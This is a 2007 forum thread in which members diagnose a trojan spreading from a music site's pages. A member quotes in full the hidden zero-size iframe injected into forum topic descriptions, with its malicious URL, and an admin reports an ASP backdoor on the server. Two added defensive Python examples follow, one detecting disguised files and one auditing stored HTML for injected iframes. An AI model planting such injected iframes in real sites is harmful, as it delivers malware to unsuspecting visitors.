Topic Closed: Virus on front page

Dean
Posted: June 07 2007 at 22:08
McAfee should be deleting the virus. Your virus scan says it has, but it re-appears - I don't understand, unless you keep getting re-infected.
 
The file pay[1].mid is in the Internet Explorer Temporary cache, so flushing out your cache should remove the file (Tools/Internet Options/General/Browsing History/Delete...).
 
Sorry, that's as much as I can help.

avestin
Posted: June 07 2007 at 22:10
^^^
Thanks for the help!


JayDee
Posted: June 07 2007 at 22:13
I'm experiencing it as well. An automatic download box pops up on my screen. It has "Florida-rentals" as the file name. I ignore it, but every time I return to the forum front page, it pops up; it's quite annoying.

VanderGraafKommandöh
Posted: June 07 2007 at 22:30
No problems my end, as I have Adblock + for Firefox (which I thought Tony R had as well?).

I'm glad I don't have it though.  I hope you all get it fixed soon.

memowakeman
Posted: June 07 2007 at 23:11
I'm having this problem too...

Dean
Posted: June 07 2007 at 23:46
Sorry I'm being remedial - the virus will reappear if the Admin team haven't got rid of it from the home page yet.
 
If anyone is not running a virus checker, you can download a free one from Grisoft called AVG - it's very good for a freebie.

Rocket_Bob
Posted: June 07 2007 at 23:47
Originally posted by Geck0:
> No problems my end, as I have Adblock + for Firefox (which I thought Tony R had as well?).
>
> I'm glad I don't have it though. I hope you all get it fixed soon.

Nice tip Gecko. I'm going to use adblock. TY

Dean
Posted: June 08 2007 at 01:03
Looks like these two attacks are related:

Originally posted by Majestic_Mayhem:
> This is the exact file name:

Originally posted by Rivertree:
> I had a look at the html source code
> a tricky iframe was inserted with the webaddress
> http://www.florida-rentals-direct.com/Realestate_images/app.htm
> do you know something about it?

but I'm not sure that they are directly related to the Exploit-ANIfile.c trojan (pay.mid).
 
The Exploit-ANIfile trojan exploits a loop-hole in IE6 & IE7's animated cursor routine. Unfortunately the trojan can be buried in any file that can be placed on a webpage (.jpg, .gif, .mid etc.) and if it is really an animated cursor file (.ani) that has been renamed it will be automatically parsed by IE. To prevent this, disable the "open files based on content, not file extension" setting in Tools/Internet Options/Security/Custom Level.

As the virus-checker spots pay.mid as the villain, then it is evident that this midi file is not really a midi file, but a disguised ani file - doing the above should stop that file being treated as a .ani - but it will not stop your virus checker finding it whenever you visit the infected page(s).
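
Added example, not part of the original thread: a check for the mismatch Dean describes, where a file named .mid actually carries animated-cursor (ANI) content. It compares each file's extension with its leading bytes; the sample file contents are constructed headers only, and the function and sample names are illustrative.

```python
import os
import tempfile

# Content type each extension is expected to hold.
EXPECTED = {".mid": "midi", ".midi": "midi", ".ani": "ani",
            ".jpg": "jpeg", ".jpeg": "jpeg", ".gif": "gif"}

def sniff(data):
    """Classify a file by its first 12 bytes, ignoring its name."""
    if data[:4] == b"MThd":                           # Standard MIDI header chunk
        return "midi"
    if data[:4] == b"RIFF" and data[8:12] == b"ACON":  # RIFF container, ANI form type
        return "ani"
    if data[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    return "unknown"

def find_mismatches(folder):
    """Return sorted (path, claimed, actual) for files whose content disagrees with the extension."""
    hits = []
    for root, _dirs, files in os.walk(folder):
        for name in files:
            claimed = EXPECTED.get(os.path.splitext(name)[1].lower())
            if claimed is None:
                continue                  # extension we do not check
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as fh:
                    actual = sniff(fh.read(12))
            except OSError:
                continue                  # locked or unreadable cache entry
            if actual != claimed:
                hits.append((path, claimed, actual))
    return sorted(hits)

def demo():
    """Scan a throwaway folder of constructed sample files."""
    samples = {
        "song.mid": b"MThd\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60",
        "pay[1].mid": b"RIFF\x00\x00\x00\x00ACON",   # ANI header bytes only
        "cursor.ani": b"RIFF\x00\x00\x00\x00ACON",
    }
    with tempfile.TemporaryDirectory() as d:
        for name, data in samples.items():
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        return [(os.path.basename(p), c, a) for p, c, a in find_mismatches(d)]
```

Pointing `find_mismatches` at a browser cache folder lists every file whose name claims one format while its header says another.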

Sean Trane
Posted: June 08 2007 at 04:51
Got it too since yesterday morning, but it is also linked to the main forum page.

mystic fred
Posted: June 08 2007 at 05:12
I found this trojan virus - it appeared on my PC at home and two where I work - McAfee picked it up but couldn't delete or quarantine it. It seemed to be lodged in my temporary internet file, which I cleaned out, and now it seems to have gone.

Dean
Posted: June 08 2007 at 06:07
Okay, I've tracked the little fCensoredker down some more, which may help you guys get rid of this damn thing.
 
pay.mid arrives in a file called ani.htm
florida-rental is deployed from a file called app.htm
 
I haven't found how these two files are attached to the Progarchive main pages yet; my guess is that they are buried in a javascript routine in one of the Ads, since pages that do not have adverts are not affected.
 
PA Admins need to get on top of this because the pay.mid is now deploying Downloader.Small.58.aw - a different virus to the one from yesterday. It won't take long before the bCensoredards find one that gets through the virus-scanners.

Dean
Posted: June 08 2007 at 07:15

I've found the virus loader on the main Forum page - it does not come in via the Ads, but is buried in the threads list under Other progressive Music Related Discussions:

<td><a href="forum_topics.asp?FID=61">Books and misc reviews</a><br />(new post by admins only)<iframe src="http://www.florida-rentals-direct.com/Realestate_images/app.htm" width="0" height="0" frameborder="0"></iframe></td>

There is probably something similar on the main page too, Rivertree  found a similar iframe on the Psyopus band page yesterday - so there could be hundreds of them - to me, it looks like the PA server has been hacked.
 

Tony R
Posted: June 08 2007 at 07:21
Thanks Dean. I am trying to contact Max at this moment.
I've got this virus back today, after clearing it last night.

What can I do? I am running AVG anti-virus, I thought I would be protected from things like this.

I have now switched back to Firefox. Am I better protected?


Dean
Posted: June 08 2007 at 07:46
Originally posted by Tony R:
> Thanks Dean. I am trying to contact Max at this moment.
> I've got this virus back today, after clearing it last night.
>
> What can I do? I am running AVG anti-virus, I thought I would be protected from things like this.
>
> I have now switched back to Firefox. Am I better protected?

As far as I know only Internet Explorer based browsers are vulnerable to the ANI Trojan, but the florida-rentals thing loads both viruses and I do not know whether mozilla-based browsers (i.e. Firefox) are immune to the other one. Firefox caches temporary internet data in a different way to IE so the virus scan probably won't find it, but it still would have been loaded when the iframe was loaded - I am not qualified to say whether this makes it safer - so I'd play safe and say it is not.

Your anti-virus software will find and kill the virus, but it cannot stop it being loaded onto your PC when you visit affected pages.

I'm getting paranoid at the moment (Master of Reality arrives tomorrow LOL) so I am running the virus checker every time I load a page from PA and PA Forum. I suggest everyone does the same.

Tony R
Posted: June 08 2007 at 07:47
You can individual pages?
How?

Dean
Posted: June 08 2007 at 07:52

Any new page gets loaded into the browser's cache; with IE this is the folder Temporary Internet Files. I use AVG to do a Selected Area Scan of that folder - it's pretty quick that way.

For IE it's:

c:\Documents and Settings\<your_user_name>\Local Settings\Temporary Internet Files

I'm afraid I cannot help with other browsers.

Tony R
Posted: June 08 2007 at 08:06
Thanks again Dean

avestin
Posted: June 08 2007 at 11:59
I don't get the message anymore. Has this been taken care of (probably) ?
 
Thanks Dean, for the online technical support!
 
 
Atkingani
Posted: June 08 2007 at 12:15
Graphix informed the following:

1) The virus scan found 1 virus on PA server that is an ASP file used as an IIS Back door that could access files and database on the server. It could be the reason why:

2) 2 rows in the database were infected. The florida-rentals-direct.com iframe HTML code was inserted in the description of 2 forum topics, "Books and misc reviews" and "Collaborators discussions (Not Related to Music)". Each time one of these forum topics was displayed, the unwanted iframe HTML hacked code was also displayed... I removed the code from the database.

If you find anything else, let me know. Your help is really appreciated, thanks again.
Guigo

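
Added example, not part of the original thread or the site's own code: an audit of stored HTML fields for the kind of injected iframe Dean found in the page source and Graphix removed from two database rows. The row ids, the `SITE_HOSTS` value and the other sample rows are constructed assumptions; row 61 reuses the markup quoted in the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOSTS = {"forum.example"}  # assumption: placeholder for the forum's own hostname(s)

class IframeFinder(HTMLParser):
    """Collect every <iframe> with the reasons it looks injected."""
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        reasons = []
        if host and host not in SITE_HOSTS:
            reasons.append("off-site src")
        if a.get("width", "").strip() in ("0", "0px") or \
           a.get("height", "").strip() in ("0", "0px"):
            reasons.append("zero size")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        self.found.append((host, reasons))

def audit_rows(rows):
    """rows: iterable of (row_id, html). Return [(row_id, host, reasons)] per flagged iframe."""
    flagged = []
    for row_id, html in rows:
        parser = IframeFinder()
        parser.feed(html or "")
        parser.close()
        flagged += [(row_id, host, why) for host, why in parser.found if why]
    return flagged

# Constructed sample rows standing in for forum topic descriptions.
SAMPLE_ROWS = [
    (12, "General discussion<br />(all members)"),
    (61, '(new post by admins only)<iframe src="http://www.florida-rentals-direct.com/'
         'Realestate_images/app.htm" width="0" height="0" frameborder="0"></iframe>'),
    (70, '<iframe src="/help/rules.htm" width="400" height="300"></iframe>'),
]

if __name__ == "__main__":
    for row_id, host, why in audit_rows(SAMPLE_ROWS):
        print(row_id, host, ", ".join(why))
```

Run against every user-editable or admin-editable HTML column, this finds rows like the two Graphix cleaned without relying on visitors' virus scanners to report them.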